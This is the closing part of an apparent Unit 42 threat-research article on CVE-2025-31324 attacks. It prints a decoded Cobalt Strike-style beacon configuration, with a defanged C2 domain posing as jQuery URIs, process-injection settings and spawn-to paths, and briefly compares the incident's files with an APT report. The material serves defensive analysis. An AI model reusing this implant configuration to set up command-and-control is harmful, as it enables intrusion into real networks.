{'BeaconType': \['HTTPS'\], 'Port': 12349, 'SleepTime': 12978, 'MaxGetSize': 1403644, 'Jitter': 50, 'MaxDNS': None, 'PublicKey': b'0\\x81\\x9f0\\r\\x06\\t\*\\x86H\\x86\\xf7\\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81\\x89\\x02\\x81\\x81\\x00\\xee8\\x01\\xd1ZN\\xd0\\x85\\x88\\x90\\x13\\xf7\\x9e\\xe9Zj\\xd9\\x84q~\\xe4eU\\xf8\\xa2;}\\xa0\\xa8\\xbe\\xe5\\x8f \\xd4\\xafV\\xad\\xf5G\\xd8P\\x1d\\x1b\\x90B4T\\x89\\xa3\\xad\\'\\xf966\\xfcRD\\xa6\\xeb\_\*")\\x9c\\xba\\x93g\\xba\\xa3x\\t\\xa6+\\xaaF\\x89\\xcb\\x7f\\xe0=\\xca\\x9e\[\\x98;\\x87\\xff\\xd3\\x9dq\\x99\\xb2\\x0c\\x86\\x067\\xfa\\x11+\\x98\\x05E\\xba\\xe1\\x9f8\\xd66\\xd9\\x0f$\\xfd\\xe4\\xba\\xf4?\\x8c\\xdb\\xd5\\xddI\\xf8B6\\xd15e\\x0f\\x02\\x03\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', 'C2Server': 'data.hs285\[.\]top,/jquery-3.3.1.min.js', 'UserAgent': None, 'HttpPostUri': '/jquery-3.3.2.min.js', 'Malleable\_C2\_Instructions': \['Remove 1522 bytes from the end', 'Remove 84 bytes from the beginning', 'Remove 3931 bytes from the beginning', 'Base64 URL-safe decode', 'XOR mask w/ random key'\], 'HttpGet\_Metadata': None, 'HttpPost\_Metadata': None, 'SpawnTo': b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', 'PipeName': None, 'DNS\_Idle': None, 'DNS\_Sleep': None, 'SSH\_Host': None, 'SSH\_Port': None, 'SSH\_Username': None, 'SSH\_Password\_Plaintext': None, 'SSH\_Password\_Pubkey': None, 'SSH\_Banner': '', 'HttpGet\_Verb': 'GET', 'HttpPost\_Verb': 'POST', 'HttpPostChunk': 0, 'Spawnto\_x86': '%windir%\\\\syswow64\\\\bootcfg.exe', 'Spawnto\_x64': '%windir%\\\\sysnative\\\\bootcfg.exe', 'CryptoScheme': 0, 'Proxy\_Config': None, 'Proxy\_User': None, 'Proxy\_Password': None, 'Proxy\_Behavior': 'Use IE settings', 'Watermark': 100000, 'bStageCleanup': True, 'bCFGCaution': False, 'KillDate': 'None', 'bProcInject\_StartRWX': False, 'bProcInject\_UseRWX': False, 'bProcInject\_MinAllocSize': 7613, 'ProcInject\_PrependAppend\_x86': \[b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90', 'Empty'\], 'ProcInject\_PrependAppend\_x64': \[b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90', 'Empty'\], 'ProcInject\_Execute': \['ntdll.dll:RtlUserThreadStart','NtQueueApcThread-s','SetThreadContext','CreateRemoteThread','kernel32.dll:LoadLibraryA','RtlCreateUserThread'\], 'ProcInject\_AllocationMethod': 'NtMapViewOfSection', 'bUsesCookies': True, 'HostHeader': '', 'headersToRemove': None}

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 | {'BeaconType': \['HTTPS'\], 'Port': 12349, 'SleepTime': 12978, 'MaxGetSize': 1403644, 'Jitter': 50, 'MaxDNS': None, 'PublicKey': b'0\\x81\\x9f0\\r\\x06\\t\*\\x86H\\x86\\xf7\\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81\\x89\\x02\\x81\\x81\\x00\\xee8\\x01\\xd1ZN\\xd0\\x85\\x88\\x90\\x13\\xf7\\x9e\\xe9Zj\\xd9\\x84q~\\xe4eU\\xf8\\xa2;}\\xa0\\xa8\\xbe\\xe5\\x8f \\xd4\\xafV\\xad\\xf5G\\xd8P\\x1d\\x1b\\x90B4T\\x89\\xa3\\xad\\'\\xf966\\xfcRD\\xa6\\xeb\_\*")\\x9c\\xba\\x93g\\xba\\xa3x\\t\\xa6+\\xaaF\\x89\\xcb\\x7f\\xe0=\\xca\\x9e\[\\x98;\\x87\\xff\\xd3\\x9dq\\x99\\xb2\\x0c\\x86\\x067\\xfa\\x11+\\x98\\x05E\\xba\\xe1\\x9f8\\xd66\\xd9\\x0f$\\xfd\\xe4\\xba\\xf4?\\x8c\\xdb\\xd5\\xddI\\xf8B6\\xd15e\\x0f\\x02\\x03\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', 'C2Server': 'data.hs285\[.\]top,/jquery-3.3.1.min.js', 'UserAgent': None, 'HttpPostUri': '/jquery-3.3.2.min.js', 'Malleable\_C2\_Instructions': \['Remove 1522 bytes from the end', 'Remove 84 bytes from the beginning', 'Remove 3931 bytes from the beginning', 'Base64 URL-safe decode', 'XOR mask w/ random key'\], 'HttpGet\_Metadata': None, 'HttpPost\_Metadata': None, 'SpawnTo': b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', 'PipeName': None, 'DNS\_Idle': None, 'DNS\_Sleep': None, 'SSH\_Host': None, 'SSH\_Port': None, 'SSH\_Username': None, 'SSH\_Password\_Plaintext': None, 'SSH\_Password\_Pubkey': None, 'SSH\_Banner': '', 'HttpGet\_Verb': 'GET', 'HttpPost\_Verb': 'POST', 'HttpPostChunk': 0, 'Spawnto\_x86': '%windir%\\\\syswow64\\\\bootcfg.exe', 'Spawnto\_x64': '%windir%\\\\sysnative\\\\bootcfg.exe', 'CryptoScheme': 0, 'Proxy\_Config': None, 'Proxy\_User': None, 'Proxy\_Password': None, 'Proxy\_Behavior': 'Use IE settings', 'Watermark': 100000, 'bStageCleanup': True, 'bCFGCaution': False, 'KillDate': 'None', 'bProcInject\_StartRWX': False, 'bProcInject\_UseRWX': False, 'bProcInject\_MinAllocSize': 7613, 'ProcInject\_PrependAppend\_x86': \[b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90', 'Empty'\], 'ProcInject\_PrependAppend\_x64': \[b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90', 'Empty'\], 'ProcInject\_Execute': \['ntdll.dll:RtlUserThreadStart','NtQueueApcThread-s','SetThreadContext','CreateRemoteThread','kernel32.dll:LoadLibraryA','RtlCreateUserThread'\], 'ProcInject\_AllocationMethod': 'NtMapViewOfSection', 'bUsesCookies': True, 'HostHeader': '', 'headersToRemove': None} |

This exact combination of svchost.exe, webcomm.dll and 0g9pglZr74.ini from the incident we investigated was also noted in another attack reportedly by an advanced persistent threat actor (APT). However, according to that report, these files were sent using a different vector.

While we saw a batch file used in our investigation, the other reported attack used a Windows Shortcut (.lnk) file during the initial attack.

*Updated May 15, 2025, at 8:45 a.m. PT to add Cortex XSIAM playbook.*

*Updated May 23, 2025, at 3:00 a.m. PT to add Appendix section with additional indicators for threat hunting.*

*Updated June 25, 2025, at 1:00 p.m. PT to note that monitoring for this activity is over.*
Back to top

### Tags

* [CVE-2025-31324](https://unit42.paloaltonetworks.com/tag/cve-2025-31324/ "CVE-2025-31324")
* [Remote Code Execution](https://unit42.paloaltonetworks.com/tag/remote-code-execution/ "Remote Code Execution")
* [Web shells](https://unit42.paloaltonetworks.com/tag/web-shells/ "web shells")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: Threat Group Assessment: Muddled Libra (Updated May 16, 2025)](https://unit42.paloaltonetworks.com/threat-group-assessment-muddled-libra-2024/ "Threat Group Assessment: Muddled Libra (Updated May 16, 2025)")

### Table of Contents

* 

### Related Articles

* [CL-STA-1062 Targets Southeast Asian Governments and Critical Infrastructure](https://unit42.paloaltonetworks.com/cl-sta-1062-tinyrct-backdoor/ "article - table of contents")
* [Threat Brief: Exploitation of PAN-OS Captive Portal Zero-Day for Unauthenticated Remote Code Execution](https://unit42.paloaltonetworks.com/captive-portal-zero-day/ "article - table of contents")
* [VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)](https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/ "article - table of contents")

## Related Vulnerabilities Resources

![Pictorial representation of a group of people interacting with a dynamic 3D holographic display of colorful, undulating data waves on a table.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/11_Myth-Busting_Overview_1920x900-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) August 4, 2026 [#### The Frontier AI Vulnerability Burst: Industrializing Autonomous Zero-Day Discovery in Open-Source Software](https://unit42.paloaltonetworks.com/frontier-ai-vulnerability-burst/)

* [AI](https://unit42.paloaltonetworks.com/tag/ai/ "AI")

* [Frontier AI](https://unit42.paloaltonetworks.com/tag/frontier-ai/ "Frontier AI")

* [Vulnerability Exploitation](https://unit42.paloaltonetworks.com/tag/vulnerability-exploitation/ "Vulnerability Exploitation")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/frontier-ai-vulnerability-burst/ "The Frontier AI Vulnerability Burst: Industrializing Autonomous Zero-Day Discovery in Open-Source Software")  
  ![Pictorial representation of AI-enabled autonomous cyberattacks. A digital illustration depicting abstract, interconnected data streams in vibrant colors on a dark blue background](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/07/AdobeStock_992950050-3-782x440.jpeg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) July 30, 2026 [#### Chinese-Speaking Threat Actor Harnesses AI Models for Autonomous Cyberattacks](https://unit42.paloaltonetworks.com/autonomous-ai-cyber-attack-campaign/)

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [Claude code](https://unit42.paloaltonetworks.com/tag/claude-code/ "Claude code")

* [CVEs](https://unit42.paloaltonetworks.com/tag/cves/ "CVEs")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/autonomous-ai-cyber-attack-campaign/ "Chinese-Speaking Threat Actor Harnesses AI Models for Autonomous Cyberattacks")  
  ![Pictorial representation of three zero-day vulnerabilities in Siemens ROX II OT switches. Digital illustration of a global network featuring interconnected lines and nodes over a map of the world, highlighted with neon lights and digital elements.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/07/03_Vulnerabilities_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) July 17, 2026 [#### Three Steps to the Terminal: A Siemens ROX II Zero-Day Trilogy](https://unit42.paloaltonetworks.com/siemens-rox-ii-zero-day-vulnerabilities/)

* [Command injection](https://unit42.paloaltonetworks.com/tag/command-injection/ "Command injection")

* [CVE-2025-40947](https://unit42.paloaltonetworks.com/tag/cve-2025-40947/ "CVE-2025-40947")

* [CVE-2025-40948](https://unit42.paloaltonetworks.com/tag/cve-2025-40948/ "CVE-2025-40948")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/siemens-rox-ii-zero-day-vulnerabilities/ "Three Steps to the Terminal: A Siemens ROX II Zero-Day Trilogy")  
  ![Pictorial representation of PAN-OS CVE-2026-0257. A vibrant city skyline at night, with tall skyscrapers and glowing digital beams extending into the sky, suggesting advanced technology and connectivity.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/06/07_Vulnerabilities_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) June 9, 2026 [#### Threat Brief: Active Exploitation of PAN-OS CVE-2026-0257](https://unit42.paloaltonetworks.com/active-exploitation-of-pan-os-cve-2026-0257/)

* [CVE-2026-0257](https://unit42.paloaltonetworks.com/tag/cve-2026-0257/ "CVE-2026-0257")

* [Vulnerability](https://unit42.paloaltonetworks.com/tag/vulnerability/ "vulnerability")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/active-exploitation-of-pan-os-cve-2026-0257/ "Threat Brief: Active Exploitation of PAN-OS CVE-2026-0257")  
  ![Pictorial representation of CVE-2026-30300. Digital illustration of a map of North America with interconnected glowing lines and dots symbolizing network connections across the continent.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/06_Vulnerabilities_1920x900-3-1-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) May 6, 2026 [#### Threat Brief: Exploitation of PAN-OS Captive Portal Zero-Day for Unauthenticated Remote Code Execution](https://unit42.paloaltonetworks.com/captive-portal-zero-day/)

* [CVE-2026-0300](https://unit42.paloaltonetworks.com/tag/cve-2026-0300/ "CVE-2026-0300")

* [EarthWorm](https://unit42.paloaltonetworks.com/tag/earthworm/ "EarthWorm")

* [PAN-OS](https://unit42.paloaltonetworks.com/tag/pan-os/ "PAN-OS")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/captive-portal-zero-day/ "Threat Brief: Exploitation of PAN-OS Captive Portal Zero-Day for Unauthenticated Remote Code Execution")  
  ![Pictorial representation of a severe Linux vulnerability. Close-up of a woman wearing glasses and focusing intently on a computer screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/05_Vulnerabilities_1920x900-2-1-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) May 5, 2026 [#### Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years](https://unit42.paloaltonetworks.com/cve-2026-31431-copy-fail/)

* [Containers](https://unit42.paloaltonetworks.com/tag/containers/ "Containers")

* [CVE-2026-31431](https://unit42.paloaltonetworks.com/tag/cve-2026-31431/ "CVE-2026-31431")

* [Kubernetes](https://unit42.paloaltonetworks.com/tag/kubernetes/ "Kubernetes")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/cve-2026-31431-copy-fail/ "Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years")  
  ![Pictorial representation of CVE-2023-33538. Abstract image of a glowing red Wi-Fi symbol on a circuit board, with intricate patterns and a futuristic appearance.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/04_Vulnerabilities_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) April 16, 2026 [#### A Deep Dive Into Attempted Exploitation of CVE-2023-33538](https://unit42.paloaltonetworks.com/exploitation-of-cve-2023-33538/)

* [Botnet](https://unit42.paloaltonetworks.com/tag/botnet/ "botnet")

* [Command injection](https://unit42.paloaltonetworks.com/tag/command-injection/ "Command injection")

* [CVE-2023-33538](https://unit42.paloaltonetworks.com/tag/cve-2023-33538/ "CVE-2023-33538")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/exploitation-of-cve-2023-33538/ "A Deep Dive Into Attempted Exploitation of CVE-2023-33538")  
  ![Pictorial representation of BeyondTrust vulnerability CVE-2026-1731. Digital art depicting a stylized mountain range with vibrant blue and red hues. The peaks are accentuated by glowing particles and an abstract, starry backdrop, creating a futuristic landscape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/14_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) February 19, 2026 [#### VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)](https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/)

* [Bash](https://unit42.paloaltonetworks.com/tag/bash/ "bash")

* [CVE-2026-1731](https://unit42.paloaltonetworks.com/tag/cve-2026-1731/ "CVE-2026-1731")

* [PowerShell](https://unit42.paloaltonetworks.com/tag/powershell/ "PowerShell")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/ "VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)")  
  ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/AdobeStock_1020436911-786x440.jpeg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) February 17, 2026 [#### Critical Vulnerabilities in Ivanti EPMM Exploited](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)

* [CVE-2026-1281](https://unit42.paloaltonetworks.com/tag/cve-2026-1281/ "CVE-2026-1281")

* [CVE-2026-1340](https://unit42.paloaltonetworks.com/tag/cve-2026-1340/ "CVE-2026-1340")

* [Ivanti](https://unit42.paloaltonetworks.com/tag/ivanti/ "Ivanti")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/ "Critical Vulnerabilities in Ivanti EPMM Exploited")  
  ![Pictorial representation of CVE-2025-0921. Digital illustration of a map of North America with interconnected glowing lines and dots symbolizing network connections across the continent.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/06_Vulnerabilities_1920x900-2-1-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) January 30, 2026 [#### Privileged File System Vulnerability Present in a SCADA System](https://unit42.paloaltonetworks.com/iconics-suite-cve-2025-0921/)

* [CVE-2025-0921](https://unit42.paloaltonetworks.com/tag/cve-2025-0921/ "CVE-2025-0921")

* [Privilege escalation](https://unit42.paloaltonetworks.com/tag/privilege-escalation/ "privilege escalation")

* [SCADA](https://unit42.paloaltonetworks.com/tag/scada/ "SCADA")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/iconics-suite-cve-2025-0921/ "Privileged File System Vulnerability Present in a SCADA System")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess)

* [Incident Response](https://www.paloaltonetworks.com/unit42/respond)

* [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform)

* [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

